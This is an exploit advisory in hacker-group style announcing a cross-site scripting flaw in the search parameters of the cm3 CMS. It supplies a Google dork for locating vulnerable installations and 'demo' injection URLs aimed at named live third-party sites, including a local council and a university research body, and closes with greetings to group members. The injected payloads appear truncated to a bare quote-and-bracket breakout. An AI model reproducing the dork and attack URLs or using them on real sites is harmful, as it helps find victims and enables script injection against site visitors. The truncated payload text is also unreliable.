# Exploit Title: cm3 cms Cross site Scripting Vulnerability # # Google Dork: Intext:"Powered by cm3" # # Date: 09/04/2012 # # Author: Crim3R & Ajax Security Team # # Home : Http://WwW.AjaxTm.com/ # # Vendor Home : http://www.cm3cms.com # # Tested on: all # ================================== [+] keywords $ strSearchPhrase parametrs in search.asp are Vulnerable to xss D3m0: http://www.mitchellshire.vic.gov.au/forums/search.asp?strSearchPhrase=">&ContainerID=&forumsearchoption=topics http://www.taxpayer.com.au/search.asp?keywords=">&SearchType=And&CurrentPage=1 http://www.ahuri.edu.au/search.asp?CurrentPage=1&sitekeywords">&SearchType=Default http://www.cm3cms.com/search.asp?SearchType=Keywords&Keywords=">&x=0&y=0 ===============Crim3R@Att.Net========= [+] Greetz to All Ajaxtm Security Member Cair3x - HUrr!c4nE - E2MA3N - S3Ri0uS - iM4n - Sc0rpion - Daniyal devilzc0der - Dominator - Hossein.R1369